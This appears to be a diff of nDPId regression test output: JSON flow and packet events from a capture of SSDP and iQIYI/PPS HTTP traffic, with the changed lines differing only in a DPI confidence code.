00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01016{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":1,"flow_last_seen":1467353189784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":473,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":473,"pkt_l4_len":439,"thread_ts_msec":1467353189784,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHLI6UAAAER3rTAqAUm7\/\/\/+gdsB2wBt3SETk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVwbnA6cm9vdGRldmljZQ0KTlRTOnNzZHA6YWxpdmUNCkxvY2F0aW9uOmh0dHA6Ly8xOTIuMTY4LjUuMzg6Mjg2OS91cG5waG9zdC91ZGhpc2FwaS5kbGw\/Y29udGVudD11dWlkOjJmNjg4ZWNlLWMwYjEtNDEwNC1iOWU1LWNiY2VlNTAzZTZiNA0KVVNOOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0Ojp1cG5wOnJvb3RkZXZpY2UNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 
-00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1393,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189784,"flow_last_seen":1467353189784,"flow_idle_time":200000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":431,"flow_tot_l4_payload_len":431,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1467353189784,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":1,"flow_last_seen":1467353189820,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353189820,"pkt":"AQBef\/\/6SNIkYwreCABFAAChDksAAAER9TXAqAUp7\/\/\/+sTGB2wAjdbrTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1394,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353189820,"flow_last_seen":1467353189820,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353189820,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 
01027{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1395,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1467353189831,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":482,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":482,"pkt_l4_len":448,"thread_ts_msec":1467353189831,"pkt":"AQBef\/\/6cBiLE+IdCABFAAHUI6YAAAER3qrAqAUm7\/\/\/+gdsB2wBwIVJTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQNCkNhY2hlLUNvbnRyb2w6bWF4LWFnZT05MDANClNlcnZlcjpNaWNyb3NvZnQtV2luZG93cy82LjIgVVBuUC8xLjAgVVBuUC1EZXZpY2UtSG9zdC8xLjANCk9QVDoiaHR0cDovL3NjaGVtYXMudXBucC5vcmcvdXBucC8xLzAvIjsgbnM9MDENCjAxLU5MUzowMDI4NWJjM2MzYmEyMDcwMDdlMWMzYjc2MjFjODQ3Ng0KDQo="} 
01084{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1397,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":1467353189909,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":525,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":525,"pkt_l4_len":491,"thread_ts_msec":1467353189909,"pkt":"AQBef\/\/6cBiLE+IdCABFAAH\/I6cAAAER3n7AqAUm7\/\/\/+gdsB2wB6x3GTk9USUZZICogSFRUUC8xLjENCkhvc3Q6MjM5LjI1NS4yNTUuMjUwOjE5MDANCk5UOnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpOVFM6c3NkcDphbGl2ZQ0KTG9jYXRpb246aHR0cDovLzE5Mi4xNjguNS4zODoyODY5L3VwbnBob3N0L3VkaGlzYXBpLmRsbD9jb250ZW50PXV1aWQ6MmY2ODhlY2UtYzBiMS00MTA0LWI5ZTUtY2JjZWU1MDNlNmI0DQpVU046dXVpZDoyZjY4OGVjZS1jMGIxLTQxMDQtYjllNS1jYmNlZTUwM2U2YjQ6OnVybjpzY2hlbWFzLXVwbnAtb3JnOmRldmljZTpNZWRpYVNlcnZlcjoxDQpDYWNoZS1Db250cm9sOm1heC1hZ2U9OTAwDQpTZXJ2ZXI6TWljcm9zb2Z0LVdpbmRvd3MvNi4yIFVQblAvMS4wIFVQblAtRGV2aWNlLUhvc3QvMS4wDQpPUFQ6Imh0dHA6Ly9zY2hlbWFzLnVwbnAub3JnL3VwbnAvMS8wLyI7IG5zPTAxDQowMS1OTFM6MDAyODViYzNjM2JhMjA3MDA3ZTFjM2I3NjIxYzg0NzYNCg0K"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":1,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1467353190040,"pkt":"TF4M6gNlABxCjnAxCABFAADGLkBAAIAGTxPAqHMI3xpqE8VLAFDaxGl\/7FKS9VAYQTcFigAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL2Rvd25sb2FkaGVscGVyLmluaSBIVFRQLzEuMQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpVc2VyLUFnZW50OiBEb3dubG9hZEhlbHBlcl9ydW54eA0KSG9zdDogc3RhdGljLnFpeWkuY29tDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQo="} -00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} 
+00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1399,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190040,"flow_last_seen":1467353190040,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1467353190040,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/downloadhelper.ini","code":0,"content_type":"","user_agent":"DownloadHelper_runxx"}} 01802{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1400,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1467353190044,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1063,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1063,"pkt_l4_len":1029,"thread_ts_msec":1467353190044,"pkt":"ABxCjnAxTF4M6gNlCABFAAQZtrxAADgGC0TfGmoTwKhzCABQxUvsUpL12sRqHVAYAB9YnAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjoyOSBHTVQNCkNvbnRlbnQtVHlwZTogYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtDQpDb250ZW50LUxlbmd0aDogNjY3DQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpFeHBpcmVzOiBGcmksIDAxIEp1bCAyMDE2IDA2OjE3OjMwIEdNVA0KQ2FjaGUtQ29udHJvbDogbWF4LWFnZT0zNjAwDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45Nw0KWC1DYWNoZTogSElUIGZyb20gMjIzLjI2LjEwNi4xOQ0KQWNjZXB0LVJhbmdlczogYnl0ZXMNCg0KW0NvbnRyb2xdDQpjb3VudD02DQpjMD1DaGVja0NsaWVudA0KYzE9UVlBZ2VudA0KYzI9bWFzZmxhZw0KYzM9bWFzYXV0bw0KYzQ9bWFzYmxvZw0KYzU9Q29va2llQ2xlYXINCltEb3dubG9hZGVyXQ0KQ2hlY2tDbGllbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9DaGVja0NsaWVudC56aXA7U3RhcnQ7OTdEQzFBMTJCQzMyMkNERjRCQjE5MjNDNEVGMTRFMU
INClFZQWdlbnQ9aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9RWUFnZW50LnppcDtTdGFydEFnZW50OzRDRDQxOTkyNjI5ODBBRjY5RDA3OThEREFBNDJGM0M5DQptYXNmbGFnPWh0dHA6Ly9tYmRhcHAuaXFpeWkuY29tL2ovb3QvbWFzZmxhZy56aXA7U3RhcnQ7RTNGRDlCMjEzMEFCQTIxNTc1QjRGNDk2RDg5Q0FGOTINCm1hc2F1dG89aHR0cDovL21iZGFwcC5pcWl5aS5jb20vai9vdC9tYXNhdXRvLnppcDtTdGFydDtEMTQ3M0E5Mjg2MjBENjZGMzM0QjI4RUYxRjk0QjA3OA0KbWFzYmxvZz1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L21hc2Jsb2cuemlwO1N0YXJ0O0JGRENCNTM1QzNFRUIwMkZEREI5NjFEMDVBNTIzQjI2DQpDb29raWVDbGVhcj1odHRwOi8vbWJkYXBwLmlxaXlpLmNvbS9qL290L0Nvb2tpZUNsZWFyLnppcDtTdGFydDtGMzlBRDlFOTgzREJCMzA5MkYxQzNDNDIwRjJBNDgyQQ=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190110,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5kJVAADMGqbHKbA7bwKhzCABQxUpzStvEq5YvP1AYADaqqAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1402,"source":"pps.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190110,"flow_last_seen":1467353190110,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190110,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50506,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":1,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190168,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPRAADMGJVPKbA7bwKhzCABQxHdtLPipvNGQx1AYAMQhYwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1404,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190168,"flow_last_seen":1467353190168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1467353190168,"l3_proto":"ip4","src_ip":"202.108.14.219","dst_ip":"192.168.115.8","src_port":80,"dst_port":50295,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1405,"source":"pps.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1467353190178,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353190178,"pkt":"AQBef\/\/6jHNut5ODCABFAAChAlEAAAERAT3AqAUc7\/\/\/+up3B2wAjbFHTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1406,"source":"pps.pcap","alias":"nDPId-test","flow_id":87,"flow_packet_id":2,"flow_last_seen":1467353190235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353190235,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5FPVAADMGJVLKbA7bwKhzCABQxHdtLPk6vNGSM1AYANYfVAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjI5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00644{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1467353190634,"pkt":"TF4M6gNlABxCjnAxCABFAAC4LnBAAIAGTvHAqHMI3xpqE8VMAFCjClS\/APxWfFAYQTf8ogAAR0VUIC9leHQvY29tbW9uL3Fpc3UyL1FZQWdlbnQuaW5pIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClVzZXItQWdlbnQ6IFFZQWdlbnRfcnVueHgNCkhvc3Q6IHN0YXRpYy5xaXlpLmNvbQ0KQ2FjaGUtQ29udHJvbDogbm8tY2FjaGUNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1407,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190634,"flow_last_seen":1467353190634,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1467353190634,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"static.qiyi.com","url":"static.qiyi.com\/ext\/common\/qisu2\/QYAgent.ini","code":0,"content_type":"","user_agent":"QYAgent_runxx"}} 00940{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1408,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_packet_id":2,"flow_last_seen":1467353190638,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":420,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":420,"pkt_l4_len":386,"thread_ts_msec":1467353190638,"pkt":"ABxCjnAxTF4M6gNlCABFAAGWcOxAADgGU5ffGmoTwKhzCABQxUwA\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"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353190892,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":1,"thread_ts_msec":1467353190892,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"106.38.219.107","src_port":50509,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1409,"source":"pps.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1467353190892,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":163,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":163,"pkt_l4_len":129,"thread_ts_msec":1467353190892,"pkt":"TF4M6gNlABxCjnAxCABFAACVLoRAAIAGUpzAqHMIaibba8VNAFAdei0\/k1iI9FAYQTd0xwAAR0VUIC9jaXR5anNvbiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVlBZ2VudF9ydW54eA0KSG9zdDogaXBsb2NhdGlvbi5nZW8ucWl5aS5jb20NCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCg=="} 